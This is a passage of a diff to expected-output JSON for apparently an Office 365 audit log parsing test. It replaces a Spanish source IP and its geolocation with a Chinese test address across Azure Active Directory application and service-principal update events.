"o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -11009,20 +10875,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -11033,8 +10897,8 @@ }, { "@timestamp": "2020-02-11T16:36:31.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -11049,7 +10913,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 347893, + "log.offset": 347757, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -11078,9 +10942,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:36:31", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11175,20 +11039,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -11199,8 +11061,8 @@ }, { "@timestamp": "2020-02-11T16:36:31.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", 
@@ -11215,7 +11077,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 352603, + "log.offset": 352465, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -11244,9 +11106,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:36:31", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11341,20 +11203,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -11365,8 +11225,8 @@ }, { "@timestamp": "2020-02-11T16:42:45.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Update application.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -11381,7 +11241,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 357313, + "log.offset": 357173, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -11410,9 +11270,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:42:45", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -11484,20 +11344,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -11508,8 +11366,8 @@ }, { "@timestamp": "2020-02-11T16:42:45.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Update application \u2013 Certificates and secrets management ", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -11524,7 +11382,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 360775, + "log.offset": 360633, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -11553,9 +11411,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:42:45", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11631,20 +11489,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -11655,8 +11511,8 @@ }, { "@timestamp": "2020-02-11T16:42:45.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Update application \u2013 Certificates and secrets management ", "event.category": "web", "event.code": "AzureActiveDirectory", 
@@ -11671,7 +11527,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 364657, + "log.offset": 364513, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -11700,9 +11556,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:42:45", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11778,20 +11634,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -11802,8 +11656,8 @@ }, { "@timestamp": "2020-02-11T16:42:45.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Update service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -11818,7 +11672,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 368539, + "log.offset": 368393, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -11847,9 +11701,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:42:45", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -11934,20 +11788,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -11958,8 +11810,8 @@ }, { "@timestamp": "2020-02-11T16:42:45.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Update service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -11974,7 +11826,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 372452, + "log.offset": 372304, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -12003,9 +11855,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:42:45", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12090,20 +11942,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -12114,8 +11964,8 @@ }, { "@timestamp": "2020-02-11T16:42:45.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Update service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", 
@@ -12130,7 +11980,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 376365, + "log.offset": 376215, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -12159,9 +12009,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:42:45", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12246,20 +12096,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -12270,8 +12118,8 @@ }, { "@timestamp": "2020-02-11T16:45:37.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Update application.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -12286,7 +12134,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 380278, + "log.offset": 380126, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -12315,9 +12163,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:37", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -12393,20 +12241,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -12417,8 +12263,8 @@ }, { "@timestamp": "2020-02-11T16:45:37.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Update application.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -12433,7 +12279,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 385372, + "log.offset": 385218, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -12462,9 +12308,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:37", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12540,20 +12386,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -12564,8 +12408,8 @@ }, { "@timestamp": "2020-02-11T16:45:37.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Update application.", "event.category": "web", "event.code": "AzureActiveDirectory", 
@@ -12580,7 +12424,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 390466, + "log.offset": 390310, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -12609,9 +12453,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:37", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12687,20 +12531,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -12711,8 +12553,8 @@ }, { "@timestamp": "2020-02-11T16:45:37.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Update service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -12727,7 +12569,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 395560, + "log.offset": 395402, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -12756,9 +12598,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:37", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -12843,20 +12685,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -12867,8 +12707,8 @@ }, { "@timestamp": "2020-02-11T16:45:37.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Update service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -12883,7 +12723,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 399473, + "log.offset": 399313, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -12912,9 +12752,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:37", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12999,20 +12839,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + 